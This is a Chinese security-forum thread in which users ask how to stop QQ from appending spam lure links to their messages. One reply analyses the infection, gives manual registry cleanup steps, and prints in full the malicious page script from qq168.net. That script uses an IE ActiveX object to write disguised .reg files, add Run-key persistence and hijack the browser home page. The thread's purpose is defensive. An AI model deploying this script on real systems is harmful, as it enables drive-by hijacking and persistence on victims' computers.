20CN网络安全小组论坛 - 病毒专区 - 我的QQ出问题啦。。帮个忙！

论坛: 病毒专区标题: 我的QQ出问题啦。。帮个忙！

复制本贴地址

作者: xujun_cool [xujun_cool]

论坛用户

为什么每次我上QQ给别人发消息都自己会带上：
我给你个超刺激的网址 HTTP://www.88music.com/ 不要告诉别人哦！
还有：我的相片刚刚扫描快去看。。。
什么什么的我没打这些话还出这样的问题怎么救QQ啊！！

地主发表时间: 09/26 19:12

回复: xiaofashi [xiaofashi]

论坛用户

理解，我的机子也是这样，没法子，删了QQ再装还是没用，朋友叫我装系统我看不用。也特来请20CN的朋友们帮忙。问题不大也不小，斑竹看到了没，我想你一定可以的，就帮帮我们好吗？
[ing]http://www.20cn.net/images/banner.gif[/ing]
在高手看来着就是DRIZZLE了，可我们不会呀555，求助

[此贴被小马儿(xiaofashi) 在 09月27日06时59分编辑过]

B1层发表时间: 09/27 06:28

回复: Mr.poss. [mmyy]

论坛用户

鄙视这种买弄技术的计算机败类。
你去天空下载站搜索“爱情森林”

B2层发表时间: 09/27 06:34

回复: xiaofashi [xiaofashi]

论坛用户

B3层发表时间: 09/27 06:36

回复: xiaofashi [xiaofashi]

论坛用户

B4层发表时间: 09/27 06:36

回复: xiaofashi [xiaofashi]

论坛用户

B5层发表时间: 09/27 06:36

回复: josn [josn]

论坛用户

我的也被传染上了，可恶啊。

B6层发表时间: 09/29 19:05

回复: josn [josn]

论坛用户

怎么办啊高手们，可不可以不重装系统啊？

B7层发表时间: 09/29 19:07

回复: disun [benww]

论坛用户

拜托各位，你们看看置顶贴好吗？这个问题已经讨论N遍了，实在不行，你去下个专杀工具

B8层发表时间: 09/29 20:35

回复: josn [josn]

论坛用户

是哪个专杀工具啊？谢谢。

B9层发表时间: 09/30 20:00

回复: xto [xto]

论坛用户

我也想知道，顶贴好像不大令人满意

B10层发表时间: 10/01 03:56

回复: cjqaxy99 [cjqaxy99]

论坛用户

华军软件园用的,专杀QQ自带病毒

B11层发表时间: 10/04 12:05

回复: wsmat [wsmat]

论坛用户

去www.google.com搜索

QQ信息发送机专杀工具

有很多。我用这个方法问题已经解决。。。

B12层发表时间: 10/04 15:35

回复: wsmat [wsmat]

论坛用户

哦对了。瑞星网站上有专杀工具。。。很好用

B13层发表时间: 10/04 15:36

回复: wsmat [wsmat]

论坛用户

B14层发表时间: 10/04 15:37

回复: honyry [honyry]

论坛用户

每次用QQ时按Cltr+Alt+Del结束一个好象叫Wooo的文件
或者是你看着不熟悉的那个很好用的！以前一个北京的QQ上的姐姐
教我的那时我的QQ就那样她是学计算机的也许有两下只

B15层发表时间: 10/07 18:18

回复: honyry [honyry]

论坛用户

关于“qq自动回复加上小尾巴！！”

近来众多网友反映qq回复时自动被加上了一些小尾巴，甚是烦人。究其原因：网页恶意代码。一些网站为了达到宣传自己、盗取qq等密码等等的可恶目的，太阴毒了！真心希望他们的无耻行为受到法律的制裁！（我没有做梦吧~）

对于http://www.QQ168.net，由于我是ie6.0，所以没有能中招（本想以身试毒，看看个究竟的，但是天妒英才，哎 ~#￥#￥~），因此本文中的情况皆为根据以往经验虚拟出来的，也许会跟您的遭遇有很多出入，但是原理相通，希望能抛砖引玉，大家最后“高高兴兴上20cn来，快快乐乐杀毒去”。另幸好本版先前“马大哈”同志给出了一帖那个恶意网站的一部分vb脚本源代码对于ie恶意修改还是有所了解。

大概病毒行为：
（1）初始状况会在%windir%\system32\或者%\system\目录下生成一些乱七遭八的木马文件！可能是exe、dll为文件后缀。应该是偷qq密码的，已经中招的，请一定注意自己的qq密码哦，最好马上修改。
（2）修改注册表，增加开机启动项目，使木马服务器端一开机就运行
在注册表中添加HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\等以run开头的项目中，内容为：%windir%\system32\具体文件这里说不准！
可能修改exe文件、txt文件和com文件等的默认打开方式（即文件关联，你一运行exe文件、txt文件或者com文件木马就被执行一次）：将HKEY_CLASSES_ROOT\comfile\shell\open\command的内容修改为了%windir%\System32\具体文件这里说不准 %1 %*。将HKEY_CLASSES_ROOT\txtfile\shell\open\command的内容修改为了%windir%\System32\具体文件这里说不准 %1 %*。将HKEY_CLASSES_ROOT\exefile\shell\open\command的内容修改为%windir%\System32\具体文件这里说不准 %1 %*。
（3）恶意修改ie的一些选项，具体的情况请参照本版置顶帖“恶意代码全攻略终结篇”。

手工清除方法：
1、运行注册表编辑器（regedit）。
2、用系统自带的任务管理器或者进程管理软件停掉可疑的进程。
3、修改HKEY_CLASSES_ROOT\comfile\shell\open\command和HKEY_CLASSES_ROOT\exefile\shell\open\command为"%1" %*，删掉HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run等run开头的项，右边可疑项目。或者运行msconfig->启动->去掉可疑项目。
4、删掉%windir%\system32\中上面发现的可疑文件。

如果您是新手，对自己的行为不是很有信心，清除过程中可以利用一下：超级兔子魔法设置或者windows优化大师等系统工具。

另外:推荐使用http://www.20cn.org/download/Defend/navce8chs.rar 诺顿杀毒软件，可以在线升级病毒库。
请升级ie或者到微软下载补丁

具体大概QQ情缘音乐世界,http://www.QQ168.net这个可恶的小尾巴中：
c:\windows\system\systel.dll、c:\windows\system.dll （注意路径和文件名）这两个为恶意vbs脚本文件，不是系统动态链接库。他们修改通过恶意修改注册表达到系统启动便自行修改ie项目的目的，可以删除掉。具体的情况请参照本版置顶帖“恶意代码全攻略终结篇”。其他的，木马文件在哪里是什么我不清楚，十分十分抱歉！

PS:www.qq168.net一部分修改ie的恶意代码
<html><script language="">
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent.class></APPLET>");
function runcmd()
{
a=document.applets[0];
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
a.createInstance();
Shl=a.GetObject();
a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');
a.createInstance();
fso=a.GetObject();
var wf1=fso.CreateTextFile("c:\\windows\\system\\systel.dll",true);
wf1.writeLine('REGEDIT4');
wf1.WriteBlankLines(1);
wf1.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]');
wf1.WriteLine('"Start Page"="http://www.qq168.net"');
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');
wf1.WriteLine('"Local Page"="http://www.qq168.net"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKLM\\Software\\Microsoft\\Internet Explorer\\Main]');
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]');
wf1.WriteLine('"Start Page"="http://www.qq168.net"');
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');
wf1.WriteLine('"Local Page"="http://www.qq168.net"');
wf1.WriteBlankLines(1);
wf1.writeLine('[-HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.WriteLine('@="regedit -s c:\\\\windows\\\\system.dll"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]');
wf1.WriteLine('"Start Page"="regedit -s c:\\windows\\system\\systel.dll"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]');
wf1.WriteLine('"Start Page"="http://www.qq168.net"');
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');
wf1.WriteLine('"Local Page"="http://www.qq168.net"');
wf1.Close();

var wf1=fso.CreateTextFile("c:\\windows\\system.dll",true);
wf1.writeLine('REGEDIT4');
wf1.WriteBlankLines(1);
wf1.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]');
wf1.WriteLine('"Start Page"="http://www.qq168.net"');
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');
wf1.WriteLine('"Local Page"="http://www.qq168.net"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKLM\\Software\\Microsoft\\Internet Explorer\\Main]');
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]');
wf1.WriteLine('"Start Page"="http://www.qq168.net"');
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');
wf1.WriteLine('"Local Page"="http://www.qq168.net"');
wf1.WriteBlankLines(1);
wf1.writeLine('[-HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.WriteLine('@="regedit -s c:\\\\windows\\\\system.dll"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]');
wf1.WriteLine('"win"="regedit -s c:\\\\windows\\\\system\\\\systel.dll"');
wf1.WriteBlankLines(1);
wf1.WriteLine('rcx');
wf1.Close();

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "regedit -s c:\\windows\\system\\systel.dll");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Start Pagewin", "regedit -s c:\\windows\\system\\systel.dll");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\win1", "regedit -s c:\\windows\\system.dll");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.qq168.net");
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.qq168.net");
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\First Home Page", "http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page","http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\☆♀精彩网站♀☆\\", "http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\�t☆顶级DJ舞曲☆�s\\", "http://www.qq168.net");
}
setTimeout('runcmd()',1000);

B16层发表时间: 10/07 18:32

回复: josn [josn]

论坛用户

谢谢各位，我已经解决了。

B17层发表时间: 10/08 09:51

论坛: 病毒专区